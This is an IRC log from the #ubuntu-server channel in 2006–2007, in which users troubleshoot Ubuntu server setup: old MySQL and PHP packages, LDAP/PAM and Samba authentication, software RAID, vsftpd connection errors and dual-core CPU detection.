#ubuntu-server 2006-09-04
<FliesLikeABrick> has anyone started testing knot 2 on server hardware yet?
<FliesLikeABrick> I've encountered a laundry list of problems with knot 2 on an ibm x330
<infinity> FliesLikeABrick: It's not had extensive testing, no.  We'd certainly appreciate bug reports filed on the kernel.  (linux-source-2.6.17 in malone)
<J_P> morning all
#ubuntu-server 2006-09-05
<J_P> hey all, one question about P4 processors in ubuntu: What ubuntu version and kernel I use for Pentium D ?
<lionelp> hi J_P, 686
<lionelp> and amd64 if it is 64bit
<dura> Good Morning everyone
<dura> Can anyone tell me what's going to break when I upgrade mysql-5.0.22 to current in regards to the new security patch today?
<infinity> dura: Err, upgrading dapper with dapper-security?  Nothing should break, since it only includes the security patch.
<infinity> dura: That's kinda the point. :)
<dura> lol
<dura> Upgrading Dapper Server with the mysql patch
<infinity> Right, but just using apt-get, I assume, not compiling upstream sources or anything insane, right?
<dura> I've had 'glitches' before upgrading mysql so I'm leary lol
<dura> right just apt-get... using binaries.
<infinity> Our update we just released in dapper-security will not hurt anything.
<dura> excellent :)
<dura> I get nervous with things like that lol
<dura> If you're a developer... Nice work with Ubuntu Server
<dura> And if you have free time (lol!) check out one of my websites... www.lfs1.net
<dura> It's been there only a month and I'm the only 'developer' for it so... it's a work in progress. Thinking of switching CMS.
<J_P> lionelp: but Pentium D is 64bits (EMT64) right  ? 
<Sivik> do y'all help people with issues if i'm trying to set up a web hosting server?
<J_P> anyone can help talk about what ubuntu server version I use in Pentium D ? is dapper 64 bits ou 32 bits server ? Becouse pentium D is EMT64...
<Sivik> since when was the pentium d 64-bit?
<J_P> anyone could help me ?
#ubuntu-server 2006-09-06
<dura> Are there any mrxvt users here?
<topa_> Hi all
<topa_> I need to know if there are any large scale deployments of Ubuntu-server in the enterprise
<topa_> any links/page ?
<dura> topa_: http://www.google.com/linux
<dura> bbl
<lionelp> J_P: sorry for the delay, but yes some pentium d are EMT64, so amd64 is the best
<topa_> I need to know if there are any large scale deployments of Ubuntu-server in the enterprise
<J_P> lionelp: "(04:24:36) lionelp: J_P: sorry for the delay, but yes some pentium d are EMT64, so amd64 is the best" But I need install ubuntu 64bits or install 32 bits with only kernel 64 bits ?
<lionelp> install Ubuntu amd64
<J_P> lionelp: ok
<bash3r> sup all
<bash3r> i guess this room is quiet cuz all the ubuntu servers are running great!!
#ubuntu-server 2006-09-07
<ccelio> hi all
<mesut> hi
<mesut> is there patched kernels (omatic and or grsecurity etc) for ubuntu-server? 
#ubuntu-server 2006-09-08
<cracka12> anyone know if ubuntu-server can be installed remotely over ssh
<cracka12> ?
<Madeye> any recommendation for dedicated ubuntu server? actually I'm having hard time in finding a datacenter that support it 
<J_P> hi all
<stagger> hi
<stagger> i'm having some trouble with ldap. does anyone know where the default files in /etc/ldap come from, how i can restore the whole directory to its original state?
<stagger> it seems to be no part of slapd since a slapd installation only creates empty directories there
<Madeye> Any idea where I can get ubuntu dedi ?
#ubuntu-server 2006-09-09
<Elon> iam having some trouble getting ubuntu installed, am i in the correct channel for help?
<Elon> (on a dell 2950 server)
<Guest6990528> HELP
<Guest6990528> icant get this ubuntu to work whit my dell 2950
<BonBonTheJon> hello
<BonBonTheJon> can someone help me with a network problem
<Madeye> do we have ubuntu-server mailing list?
#ubuntu-server 2006-09-10
<pgquiles> does anybody know of a tftp server which implements RFC2347 (i. e. transfer files > 32MB)?
#ubuntu-server 2007-09-03
<maestrojed>  I need to turn my Ubuntu 7.04 Desktop installation into a LAMP server.  But I need to use older versions of Apache, PHP, MySQL, etc.  Can anyone help me with this?  Where can I get older versions of php for linux?
<Pumpernickel> archive.ubuntu.com
<maestrojed> Pumpernickel: Thank you, I have to admit I dont really know what I am doing.  I went there and see legacy versions of ubuntu but were should I go to get the legacy php install
<Pumpernickel> archive.ubuntu.com/ubuntu/pool
<maestrojed> I am building a linux webserver to be a test server.  My production server is running php 4.3.11.  I only see files for php 4.4.2.  Should I try to find the exact same version of PHP? or do I assume that those point updates are just security fixes and would not make a difference as far as how the php parses?
<ScottK> maestrojed: What distribution does your production server run?
<maestrojed> ScottK: Of Linux?
<maestrojed> ScottK: Linux 2.4.20-021stab028.19.777-smp
<ScottK> Right, but what distro?
<ScottK> Unless you build from the same distribution/version you will not be able to be sure you get the same behavior on your test server.
<ScottK> That's all pretty extraordinarily ancient.
<ScottK> I would not assume that php 4.3/4.4 would behave the same, but is not a PHP expert.
<maestrojed> Humm Cool.  I wanted to go with Ubuntu because of the GUI.  As you can tell I only bearly know what I am doing
<maestrojed> :)
<ScottK> OK.
<maestrojed> I am trying to figure out what distribution but I am not sure how to figure that out
<ScottK> Try less /etc/lsb-release
<maestrojed> I get no such file or directory
<maestrojed> I looked through the etc folder but I dont see anything similar
<ajmitch> check /etc/redhat-release
<ScottK> or /etc/fedora-release
<ScottK> Google hints it's Red Hat or a derivative.
<maestrojed> yeah there is redhat-release
<ScottK> What's it say?
<maestrojed> I am getting a permissions denied but I am in as root
<maestrojed> Trying to figure it out
<ScottK> Odd.
<maestrojed> CentOS release 3.8 (Final)
<maestrojed> does that sound right
<ScottK> OK.  Well if what you are after is something in a test server to emulate closely your production environment, you should probably be looking at something from CentOS.
<ScottK> Yes.
<ScottK> But, that is ancient and so you might consider something newer for your production server too perhaps.
<ScottK> I've got to run, maybe someone else can help you further.
<maestrojed> yeah,  It is a managed server so I will talk to them
<maestrojed> thanks for your help
<ScottK> No problem, but just to give you an idea, PHP 4 has been completely removed from the current Ubuntu version.
<ScottK> That's how old that is.
<maestrojed> yeah I know.  I have a php5 server too but I have some old big CMS sites that are not ready for php5 so I keep this one around too
<Yahooadam> can anyone help me with my MySQL problem, i posted on the forums, but its kinda ground to a halt (http://ubuntuforums.org/showthread.php?t=539909)
<Yahooadam> basically, mysql doesnt start when my server boots, any ideas ?
<ScottK> Yahooadam: Does /var/run/mysql exist?
<Yahooadam> ./var/run/mysqld does
<ScottK> OK.
<ScottK> So much for my idea on that one.
<Yahooadam> :(
<Yahooadam> oh well time to sleep, gnite, thx anyway :)
<Yahooadam> if anyone has any ideas and reads this later, please do post on that thread
<kraut> moin
<spiekey> hi
<spiekey> i have set up a ubuntu with smbldap-tools. I can log in with ssh and so on. It all works. Now i would like to know why ;)
<spiekey> when i log in via ssh i tell it to use common-auth where i have my pam_ldap.so written down.
<spiekey> then i GUESS it will check out /etc/libnss-ldap.conf, /etc/pam_ldap.secret /etc/pam_ldap.conf
<spiekey> so it knows where to auth.
<spiekey> correct so far?
<soren> Almost :)
<spiekey> almost?
<soren> I don't think it uses libnss-ldap.conf for the authentication, but only immediately after.
<soren> Not that it matters, really.
<spiekey> ok.
<soren> During authentication it checks if the username and password corresponds. It doesn't need nss for that.
<spiekey> nss is just for the enviorment stuff like homedir?
<soren> ...but as soon as it actually does a setuid and all that, it needs nss.
<soren> spiekey: At any point where you need to do uid <-> username translation, you need nss.
<spiekey> so pam_ldap is for auth only.
<spiekey> how does it know where to find it in the ldap database?
<soren> spiekey: And that's at the final stages of logging in (i.e. after verifying your credentials, but before running your shell and such)
<soren> spiekey: Find what?
<spiekey> to see if password and username matches
<spiekey> (this still looks like magic to me9
<soren> :)
<soren> It's quite simple, actually.
<soren> The LDAP server is set up to let the user authenticate. So pam proxies the login request to the LDAP server. If that succeeds, pam succeeds.
<spiekey> oh, so pam just asks ldap if the auth is okay? And ldap does the rest with its schema?
<spiekey> well, ldap looks it up by using the schema it has in its config
<soren> Pam receives a username.. it passes the username to each of the configured modules and asks them what they feel like doing with it. Most of them will ask for a password. In the case of ldap, it takes the username, inserts it into a scheme like cn=theusername,ou=People,dc=foo,dc=bar and tries to authenticate with that dn and the given password.
<soren> spiekey: Yes.
<soren> spiekey: That's the usual arrangement, anyway.
<soren> spiekey: (In my experience, that is)
<soren> There are other ways to do it, though.
<spiekey> well. I guess this applies for the pam_ldap module :)
<soren> You can also let pam do the authentication directly. You tell pam how to extract the userPassword attribute for the user, and then verifies it. This is useful if you don't want the users to be able to access the ldap server directly at all.
<spiekey> easy enought though
<spiekey> soren: oh yes! i did that once with pam_mysql ;)
<soren> ...but usually you want to use ldap for other interesting stuff, too.
<soren> Hang on. Phone call...
<spiekey> np, thanks!
<soren> Ok, I'm back.
<soren> Um... Did that clear everyhithin up?
<spiekey> in that case, yes! :)
<soren> Alright. Great.
<spiekey> I have got another question though: Where does samba auth against? Does that work via pam_ldap, too? Since i have a "passdb backend = ldapsam:ldap://127.0.0.1/" line in here i am not quite sure.
<soren> spiekey: No, samba usually can't use pam.
<spiekey> oh, okay.
<soren> spiekey: You see, when you're using ssh, the password is sent over the ssh channel, so that the server can choose what to do with it (typically something about calculating an md5 and comparing it to something).
<soren> ...but when you're using samba, it sends a hash of the password, rather then the password itself.
<spiekey> that makes sense
<soren> This means that the server needs to be able to compare that hash with something, and that's not how pam works.
<soren> This is why samba doesn't just use the system's passwd file for authentication.
<soren> Back in the day when you could still use unencrypted passwords, you could do that, but that was a looong time ago :)
<spiekey> Samba gets all the samba-Specific information from ldap. Like: Ihave user Foo with passwd far. Auth OK? If yes it asks for the homedir, passwordexpiredate, etc, too?
<kshah> I want to set up a Wake on LAN for my server, should I install etherwake?
<Pyretic> i think etherwake might be the client
<Pyretic> you need ethtool though
<kshah> oye
<kshah> k
<Pyretic> i had it working on my non-ubuntu machine a while ago
<kshah> thank you, testing time
<soren> spiekey: Sounds right.
<spiekey> soren: wonderful!
<spiekey> soren: i am about to draw/write a chart about the whole system thing. Would you mind reading/correcting it when its finished?
<soren> spiekey: I'll try.
<soren> spiekey: Is it urgent?
<spiekey> its basically what i asked you just with drawn pictures :)
<spiekey> soren: no, not at all
<soren> spiekey: Alright. Then no problem :)
<spiekey> soren: are you here regularry?
<soren> spiekey: All day, every day :)
<spiekey> :)) How come?
<soren> spiekey: Well, I don't log off IRC when I'm not around, and I'm around at least during business hours (central european ones) and a lot of my spare time, too.
<spiekey> ok, cool!
<kshah> what client program are you using (win) to send Wake on LAN requests?
<Pyretic> say, how would one enable lvm to enable on startup ?
<leonel> Pyretic: install with the alternate cd
<Pyretic> oh, there's no way to enable it lateron ?
<Pyretic> it just doesn't seem to do a "vgchange -a y data"
<maestrojed> I am trying to install an older version of MySQL on Ubuntu.  I do not see a bulld in archives.ubuntu.com/pool.  Does this me that there are not DEB(s) for MySQL?
<osmosis> how come I dont see a amazon EC2 image of ubuntu ?
<mathiaz> maestrojed: you can find mysql deb in the archives.
<maestrojed> mathiaz: thanks, but all I see in the archives is the list below.  Am I looking in the wrong place (pool/universe/m/)
<maestrojed> mysql++/
<maestrojed> mysql-admin/
<maestrojed> mysql-dfsg-4.1/
<maestrojed> mysql-dfsg/
<maestrojed> mysql-navigator/
<maestrojed> mysql-ocaml/
<maestrojed> mysql-query-browser/
<maestrojed> mysql-ruby/
<maestrojed> mysqlcc/
<maestrojed> mysqltcl/
<mathiaz> maestrojed: mysql-dfsg-4.1 is the mysql-server
<maestrojed> mathiaz: Great! Thank you.
<konam> hi
<konam> how do i know the interface that my server is using? there's a command for that. I have ubuntu server in a virtualbox vm
<konam> is just that i set the internet connection in that virtual machine and shut it down. when i turn it on again the internet connection was gone
<sommer_> konam: have you tried ifconfig?
<sommer_> usually it's eth0
<konam> sommer_ thanks
<osmosis> anyone using EC2 ?
<maestrojed> I am trying to install an older version of MySQL server.  I downloaded mysql-server-4.1_4.1.15-1ubuntu5_i386.deb it said it needed libmysqlclient14_4.1.15-1ubuntu5_i386.deb so I downloaded and installed it first.  Now on package install I get and error.  Error:Failed to satisfy all dependencies (broken cache)
<maestrojed> it then says to run sudo apt -get install -f   to fix it but that returns sudo: apt: command not found
<Anarch> maestrojed: s/apt -get/apt-get/
<maestrojed> Anarch: I run that in terminal?
<Anarch> maestrojed: But this may not solve all your problems.  When I can't get the package manager to Just Work, I cope by building from source.
<Anarch> maestrojed: Yes, apt-get in terminal.
<mathiaz> maestrojed: on which version of ubuntu are you trying to install 4.1 ?
<maestrojed> Desktop 7
<mathiaz> maestrojed: well. It won't work as mysql-server-4.1_4.1.15-1ubuntu5_i386.deb is from dapper (6.06)
<maestrojed> doh
<maestrojed> mathiaz: is there a build that will?
<mathiaz> maestrojed: this is why apt and dpkg are not happy.
<mathiaz> maestrojed: not for feisty.
<mathiaz> maestrojed: mysql-server-4.1 is no longer available for feisty
<mathiaz> maestrojed: it's replaced with mysql-server-5.0.
<maestrojed> so If I am tying to  build it just like my production server.  Is there a solution?
<maestrojed> build from the binaries?
<mathiaz> maestrojed: you could try to build from the dapper source on you feisty box.. But I don't know if that would actually work.
<jbrouhard> Howdy all
<jbrouhard> Anyone here consider a SOHO version of Ubuntu Server ?
#ubuntu-server 2007-09-04
<leonel> How about  an  Enterprise support for Motu-server  :)
<ftoo_on_gutsy> how about enterprise support for ipv6-only-ubuntu-server
<ftoo_on_gutsy> or even enterprise support for my nackered old back .... :)
<mikubuntu> am i connected here, or is there just no chatter tonite
<jbrouhard> virtually no chatter
<jbrouhard> hey PanzerMKZ
<mikubuntu> jbrouhard: i wondered
<mikubuntu> can anyone suggest the easiest approach to setting up the server packages i need to be able to start building ecommerce product pages?  oh, ya, very newb question.
<mikubuntu> alternatively, can anyone be my b*#%&, and just handle the difficult parts for me? (i learned that on the linuxhelpask page, where they recommend the approach)
<mikubuntu> lol
<monsterb> hi all
<monsterb> !bind
<ubotu> Sorry, I don't know anything about bind - try searching on http://ubotu.ubuntu-nl.org/factoids.cgi
<soren> mikubuntu: Depends. Do you already have the e-commerce software?
<kraut> moin
<pteague> is there a reason my ubuntu server is doing everything in uppercase?
<mralphabet> pteague: define "everything"
<raky> is this true?  "GRUB has built-in support for basic networking; this makes network booting extremely easy. Unfortunately the pre-built binaries don't have this support compiled in; you will need to compile GRUB for your specific network card."
<mathiaz> raky: yes.
<dholbach> hey folks
<dholbach> I'm just triaging the sponsoring bug queue at the moment
<dholbach> could somebody check out the patch on bug 91607?
<ubotu> Launchpad bug 91607 in postfix-policyd "postfix-policyd init script doesn't behave" [Undecided,Fix released]  https://launchpad.net/bugs/91607
<dholbach> oops sorry that's fixed already
<CharlieSu> How do you tell what status code a program exited with?
<soren> CharlieSu: Depends... If you just ran it from the command line, "echo $?" immediately after it will show you the exit code.
<CharlieSu> soren: thanks dude..  that worked.. what other ways are there?
<mralphabet> strace
<soren> CharlieSu: It depends on how you're calling the program.
<soren> CharlieSu: If you're calling it from a C program, it's part of the return code from the wait() system call.
<m11> evening all
<pteague> mralphabet> nope, i mean all the characters are showing up as uppercase...  caps lock off ls shows up as LS, but it does the ls command... if i use shift or caps lock it shows up as LS, but says command not found...  ls / shows stuff like BOOT, ETC, DEV, etc - rebooting fixed it i think
<mralphabet> pteague: o0 that's odd to say the least
<soren> pteague: What's your username on the machine?
<soren> pteague: Does it begin with an uppercase letter, perhaps?
<pteague> nope
<pteague> i've been using linux a while... just the first time i set up ubuntu server
<soren> It's pretty easy to reproduce.
<soren> In a console (when logging in) type the username in uppercase letters.
<mralphabet> o0
* mralphabet has never seen that
<soren> mralphabet: You need to think back to the day when not all terminals supported both upper and lower case letters.
<mralphabet> soren: it is possible that predates my experience
<soren> mralphabet: Quite possibly. Do you have a long grey beard?
<mralphabet> soren: no, I shave ;)
<soren> Then you're not old enough. :)
<mralphabet> hah
<pteague> it looks like my mdadm.conf file is messed up... it doesn't list any of the drives that are a part of the raid array
<pteague> ah, i see it's using /proc/partitions ... any idea how i can figure out the UUIDs of certain devices? such as /dev/sda1, etc?
<soren> /lib/udev/vol_id
<mralphabet> pteague: /dev/disk/by-uuid/
<mralphabet> ls -al /dev/disk/by-uuid/ specifically
<soren> Or just "sudo /lib/udev/vol_id /dev/sda1", for instance.
<pteague> ok, now i'm confused as to why UUIDs are being used in /etc/fstab instead of just /dev/hda1 for example
<pteague> does ubuntu automatically rebuild the soft links on boot based on the serial # or something from the devices to keep the UUIDs the same?
<pteague> or maybe the person who told me the switch to UUIDs in /etc/fstab because /dev/hda1 may never point to the same device didn't know what they were talking about?
<ScottK> pteague: What release are you running?
<pteague> 7.04
<ScottK> UUID is generally the way to go then.  "the person" was on target for machines with more than one drive (or array in the RAID case).
<ScottK> Looking where mralphabet said is the right place to look.
<pteague> yeah, but the 3 drives i'm using in my raid array do not have UUIDs assigned to them...  I'm trying to figure out how to make the raid array be more stable or something... everytime i reboot it states that none of the devices in the array were detected & that there was no raid superblock on sda (or maybe sda1?) & then it looks like it attempts to reimage the raid array
<pteague> http://pastebin.com/m7c438d46
<ScottK> If you are doing it by device name, shouldn't it be md0?
<pteague> yes, md0 is made up of 3 drives - /dev/sda1, /dev/sdb1, & /dev/sdc1 - after booting it has to put the raid back together again & it's saying the /dev/sda1 does not have a valid raid superblock
<mralphabet> pteague: grub doesn't like to boot to raid 5
<pteague> /dev/hda1 is mounted as /, /dev/hda2 is swap, & md0 is mounted as /home
<pteague> /dev/hda is an 5.8g pata hd & /dev/sda-sdc are 400g sata hds
<pteague> mralphabet> or is the 'error' being reported because it's initially trying to attach it when linux is booting up & fails, but then puts it together & mounts it later?
<mralphabet> pteague: if you look at /boot/grub/menu.lst, what is the partition it is trying to boot?
<mralphabet> ie for mine it says: kernel          /boot/vmlinuz-2.6.20-15-server root=/dev/md0 ro quiet splash
<mralphabet> in my case, md0 is mirrored pata 80's
<pteague> it boots off the UUID that i believe is the UUID for /dev/hda1
<pteague> dang, i moved the box to where it needs to go & now it's giving me fsck failed & dumping me into admin mode... apparently my md0 is failing - it has an invalid ext2 partition
<mralphabet> ouch
<pteague> at least it's /home & i hadn't completely rsynced it yet
<m11> hey guys
<m11> i am planing to get dell poweredge 2900 , did any of you tested that server with ubuntu ?
<m11> http://www.dell.com/content/products/productdetails.aspx/pedge_2900?c=us&cs=04&l=en&s=bsd&~section=specs#tabtop
<pteague> ah, it's saying /dev/sda1 appears to contain an ext2 filesystem & also appears to be part of a raid array, /dev/sdb1 appears to be a part of a raid array, & cannot open /dev/sdc1: device or resource busy
<pteague> i may just reinstall stuff & see if i can get it to work correctly again
#ubuntu-server 2007-09-05
<Tanman> i was wondering if i can get any support on ubuntu server and top...afer a few days top does not work on my server anymore, when i try and run it it just sits there and waits
<Tanman> i was wondering if anyone has come across this type of behaviour
<pteague> any idea why i would get "md0: raid array is not clean -- starting background reconstruction" on boot right after installation?
<jedherzog> I am about to complete a LAMP installation on my Ubuntu Feisty Desktop Box.  I want the GUI which is why I am using the Desktop version instead of the Server version.  I am following this tutorial. http://www.howtoforge.com/ubuntu_lamp_for_newbies   I know that using the server edition not only can preinstall LAMP but it also takes a lot of security steps (i.e. closing certain ports).  This tutorial only installs LAMP and does n
<jedherzog> ot cove
<jedherzog> r any additional steps that might be needed for security.  Is there anything you can suggest that I do?
<nandemonai> maestroJed, A firewall app would be good. I'd suggest Firestarter if your using a gui.
<nandemonai> maestroJed, http://doc.ubuntu.com/ubuntu/serverguide/C/index.html should be helpful to.
<maestroJed> nademonai: many thanks
<nealmcb> maestroJed: also note that the desktop default install is secure (no ports open by default) just like the server one.  And not everyone thinks firewalls are that useful for servers that are properly upgraded and maintained.
<nealmcb> having x11 on a server with all the extra associated bug risks might be the most dangerous security concern :-)
<nandemonai> np maestroJed and totally agree nealmcb ;)
<nijaba> hello
<julius> anyone know of any good cli power managment utilities?
<julius> powersaved wont work for me
<soren> Grr.... People who only way 5 minutes for an answer tick me off..
<ajmitch> they're probably better off asking in #ubuntu - that place is never quiet
<soren> ajmitch: The worst example was some guy who over the course of about a month kept logging on, asking a (studid) question, and logging off again after less than two minutes. Every time I stopped by the channel and noticed he had done it again... Grr...
<soren> I mean... Two minutes? What did he expect?
* Starting logfile irclogs/ubuntu-server.log
<asmarin> hi
<asmarin> i have a dl 145 g2 with ubuntu hoary and i cant upgrade it is on production
<asmarin> i need php-ldap package and i cant install because obviously arent on net
<asmarin> anybody knows an active site mirror?
<osmosis> anyone use 64bit ubuntu server ?
<mathiaz> osmosis: yes.
<osmosis> does it have all the same packages as 32 bit ubuntu, or are some packages different ?
<mathiaz> osmosis: what do you mean by different ?
<mathiaz> osmosis: you'll find the same packages for 32 and 64 bits.
<osmosis> i hear the  xen-server PAE package wouldnt be needed on 64bit, since PAE isnt needed on 64 bit.
<froud> anyone here who can help with building martian on 2.6.15-26-server
<froud> It fails to build the martian_helper
#ubuntu-server 2007-09-06
<CrazyTB> What's the easiest way to enable 2 CPUs on a brand-new ubuntu-server running on AMD x2?
<ajmitch> it should just work
<mathiaz> CrazyTB: it should be enabled by defaut
<CrazyTB> cat /proc/cpuinfo shows only one CPU
<ivoks> and how many do you have?
<ajmitch> what kernel are you running?
<ajmitch> ivoks: he said it's an amd x2, so dual-core
<ivoks> hi ajmitch
<ajmitch> hi :)
<CrazyTB> yes, one AMD x2 CPU (so, two cores)
<ivoks> i would bet on bios
<CrazyTB> both vmlinuz-2.6.20-16-server and vmlinuz-2.6.20-15-generic detect only one.
<ivoks> grep processor /proc/cpuinfo
<ivoks> shows only processor   : 0?
<ivoks> check BIOS, maybe X2 is disabled
<CrazyTB> I'm at BIOS setup right now...
<CrazyTB> Phoenix BIOS... Do you know the name of what I should enable?
<ivoks> i don't know what name would be for AMD :/
<ivoks> for intel it's something like Core Multiplex, or something like that, IIRC
<ivoks> i don't rember names, i read them
* ajmitch doesn't even recall seeing it in his bios
<ajmitch> though it's been awhile since I had to change anything there
<ivoks> i had to, yesterday
<CrazyTB> well, I can't find anything...
<ivoks> when i wanted to run C&C on gutsy :)
<ivoks> CrazyTB: did you use noapic or additional paramateres for kernel?
<ivoks> so many typos... :/
<CrazyTB> for some reason I think ubuntu kernel is compiled for at most 1 CPU...
<CrazyTB> ivoks, gotta check that, wait a moment
<ivoks> CrazyTB: cat /proc/cmdline
<ajmitch> CrazyTB: only the -i386 kernel was in previous releases
<ivoks> right, all kernels are SMP
<ajmitch> since there were some drivers that couldn't handle SMP
<ajmitch> I believe that was dropped in feisty
<CrazyTB> These are the boot parameters: ro quiet splash
<ajmitch> nothing unusual there
<CrazyTB> huh...
<ajmitch> maybe pastebin the first couple of hundred lines of /var/log/dmesg
<CrazyTB> dmesg | fgrep -i cpus
<CrazyTB> SMP: Allowing 1 CPUs, 0 hotplug CPUs
<CrazyTB> Brought up 1 CPUs
<ajmitch> I see [    0.000000]  SMP: Allowing 2 CPUs, 0 hotplug CPUs
<ivoks> i don't get that at all :)
<ajmitch> ivoks: I've got an x2 as well :)
<mathiaz> CrazyTB: which version of ubuntu-server are you running ?
<ivoks> feisty
<CrazyTB> 7.04
<CrazyTB> kernel: 2.6.20-15-generic
<CrazyTB> or: vmlinuz-2.6.20-16-server
<CrazyTB> do you know where can I get the ubuntu kernel sources?
<ivoks> i still bet on bios
<CrazyTB> Or at least the .config ?
<ivoks> /boot/config-2.6.20-16-server
<ivoks> but, trust me, milions of users use it - and it's SMP
<CrazyTB> Is CONFIG_NR_CPUS what I think it is?
<ajmitch> CrazyTB: can you put the rest of /var/log/dmesg on pastebin somewhere?
<ivoks> CrazyTB: max. number of supported CPUs
<ivoks> iirc, on -server, it's 16
<CrazyTB> hum... I'm starting to suspect of the bios...
<ivoks> oh no, not 16, 64 :)
* ajmitch wouldn't mind a 64-cpu system at home
<ajmitch> except for the noise & power bill :)
<ivoks> CrazyTB: look very closely...
<ajmitch> nealmcb: it's ok, I don't mind you uploading stuff to your PPA ;)
<ivoks> ajmitch: umm, something like this:
<ivoks> ajmitch: http://cluster.grad.hr/index.php?page=monitor
<ajmitch> it'll load one day...
<ivoks> yup :)
<ivoks> or not :)
<ivoks> lol, it crashed; i can't belive... it crashed :/
<ivoks> ajmitch: i'll show you tomorrow :)
<CrazyTB> looks like the bios does not support x2. A friend is taking a closer look to that.
<CrazyTB> in case someone actually wants to see the dmesg... http://sh.nu/p/22696
<ivoks> CrazyTB: right, everything fine here
<ivoks> bios/mb is my guess
* CrazyTB guesses you are right
<CrazyTB> ok, thanks people. gtg. Bye
<nealmcb> ajmitch: of course - I just wish the system didn't spam you with embarrassing build errors on my part :-O
<nealmcb> but it looks like they're fixing that aspect of ppa as we speak: bug 136418
<ubotu> Launchpad bug 136418 in soyuz "[ppa]  Report email is sent to original maintainer and uploader" [Critical,In progress]  https://launchpad.net/bugs/136418
<ajmitch> nealmcb: nope, just 2 rejected notices that I saw
<nealmcb> ajmitch: so now when I try to build my takeoff on authtool 0.2.1  I get "make: dh_pycentral: Command not found" - does it need another build dependency?
<ajmitch> yes, most likely
<ajmitch> I need to rework debian/{control,rules}
<ajmitch> since I know it's not working as intended
<ajmitch> I've been meaning to actually sit down & merge changes in - I'd better actually do as I said soon :)
<nealmcb> is there a nice small  python package anyone could recommand as a template to modify for my ppa experiments?
<ajmitch> pyflakes? :)
<ajmitch> that's very simple
<nealmcb> I
<nealmcb> I'm looking for something that models both the latest methods of packaging, and the cleanest python coding, documentation, unit tests, etc
<ajmitch> ah, that's not the best package to look at then
<ajmitch> perhaps gdebi
<leonel> I need psycopg2  in dapper  :-P
<leonel> haven't been able to  backport or make the package from scratch
<ajmitch> probably due to the python packaging changes that took place
<ajmitch> nealmcb: how's gdebi looking?
<nealmcb> ajmitch: if I want the package to build in dapper as well as gutsy, would the latest gdebi (for example) work, or should I use an old gdebi?
<ajmitch> nealmcb: you'd be hard pressed to find any package that would build in dapper & gutsy without hassle
* nealmcb sighs
<ajmitch> since I'm sure that edgy was the big python shakeup
<ajmitch> all dependencies changed from python2.X-foo to python-foo, python-central & python-support were introduced
<nealmcb> ahh
<ajmitch> I know, it was a hassle to change all these packages :)
<nealmcb> maybe I should experiment with a bash package :-)
<ajmitch> are you just looking for something to do with a PPA?
<nealmcb> yup
<ajmitch> why does it need to build on dapper then?
<ajmitch> there's not even a dapper PPA, unfortunately
<nealmcb> seems to me that ppa is a great opportunity to introduce folks to packaging in general, and an example that lets anyone on any supported release package some personal productivity tools would be a good intro
<nealmcb> ajmitch: oh, yeah - right - I just noticed that....
<nealmcb> I wonder why
<nealmcb> makes it hard for server folks....
<ajmitch> yes, and I hope it'll be changed soon
<nealmcb> so let me ask the question on gdebi for feisty and gutsy - should I start with the latest, or use the feisty version?
<ajmitch> there shouldn't be too much difference between feisty & gutsy
<nealmcb> edgy?
<ajmitch> I haven't looked at that one, the packaging should be similar though
* nealmcb branches gdebi and fires off a ppa build
<nealmcb> ajmitch: hmm - this conversation would probably be better suited to perhaps #ubuntu-motu, and you're there also...
<ajmitch> yes
<kshah> I'm having a bit of problems with vsftpd, and I'd really appreciate a small bit of help if anyone is around
<mralphabet> kshah: we are not psychic, we need to know what your problem is before we can troubleshoot it
<mralphabet> Seriously good guide to asking questions on IRC: http://www.sabi.co.uk/Notes/linuxHelpAsk.html
<kshah> I know, I know, it's just that its late, otherwise I wouldn't have asked to ask
<kshah> let me post the error
<mralphabet> irc never sleeps, there is just a lull in activity
<kshah> :) hehe
<kshah> Transfer channel can't be opened. Reason: No connection could be made because the target machine actively refused it.
<mralphabet> actively refused it . . . did you install a firewall on the machine?
<kshah> I don't believe so, it is the default set up for ubuntu server 7
<kshah> I followed the server guide w/o incident
<kshah> only thing I did differently was setup trac after svn
<mralphabet> if you do a netstat -a does it list ftp in the list?
<mralphabet> if you telnet to port 21 locally does it answer?
<kshah> *:ftp  LISTEN
<kshah> wow that was a crazy command
<kshah> it lists everything
<kshah> mralphabet: yes, telnet to port 21 works
<kshah> "220 Welcome to..."
<kshah> my little msg
<mralphabet> if it works locally and doesn't work across the network . . .
<mralphabet> have you looked at syslog or the messages file to see if it tells you what the problem is?
<kshah> honestly I'm new to linux, I don't know how to many many things from the command line
<kshah> as my amazement from netstat -a might reveal
<mralphabet> do 'cd /var/log'
<mralphabet> then 'less messages'
<kshah> sudo nano vsftpd.log
<kshah> i guess?
<mralphabet> that works too
<kshah> it says OK LOGIN for every attempt I made
<kshah> CONNECT: Client "my.ip.at.this.comp"
<mralphabet> o0
<kshah> could this by any chance be something in my network/interfaces file?
<kshah> the fact that I specified broadcast in my old set up
<kshah> and not this
<mralphabet> possible, unlikely I think
<mralphabet> and I am unfortuneately heading out
<kshah> thanks, lets hope it worked
<kshah> I'll init 6
<kshah> see i knew that one
<kshah> what is wrong with sudo mount localhost:/mydir /mydir
<kshah> nfs
<asisak> kshah: this seems to be valid, but without any error message it would be hard to guess
<kshah> permission denied while i'm running as sudo
<kraut> moin
<Drazha> question: why compile ubuntu server for sparc, but not the ubuntu(destop) ?
<soren> Drazha: That's really a desktop question, isn't it? :)
<soren> Drazha: What specifically are you missing on sparc?
<Drazha> nothing, just was curious, why not have ubuntu on sparc? :)
<soren> Drazha: What makes you say that we don't have Ubuntu on sparc? That's what I'm asking.
<Drazha> i cant recall seeing it on the list, let me recheck
<soren> Drazha: http://archive.ubuntu.com/ubuntu/dists/feisty/main/binary-sparc/Packages.gz
<Drazha> heh
* Drazha just put a foot in his mouth
<soren> :)
<Drazha> well actually
<Drazha> there seems only to be a ubuntu server iso for sparc?
<soren> Possibly, I don't remember.
<soren> Still... That's more of a -desktop question, really :)
<Drazha> thats fine
<soren> Drazha: The packages are there, though, so you could run an LTSP-like setup on your sparc machine and have a load of thin clients connect to it.
<ScottK> Any thoughts on syncing php-make to get this and other bug fixes: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=424787
<ubotu> Debian bug 424787 in dh-make-php "dh-make-php: affected by php4-removal" [Serious,Fixed] 
<ScottK> Rather dh-make-php
<renzo17> hi all, i have Fesity set up as a primary domain controller for a small XP Pro based network. if i was to have to reinstall and set it up again can i use it with the accounts on the windows pc that i already have setup to use the pdc without it creating a new local account on the client machines? i ask because we had a massive HD failure a while ago, and i replaced fedora with fesity, set it...
<renzo17> ...up with the same settings, but when people went to log back in on their xp machines, it created a new local account for them........is this avoidable?
<ScottK> In general, no.
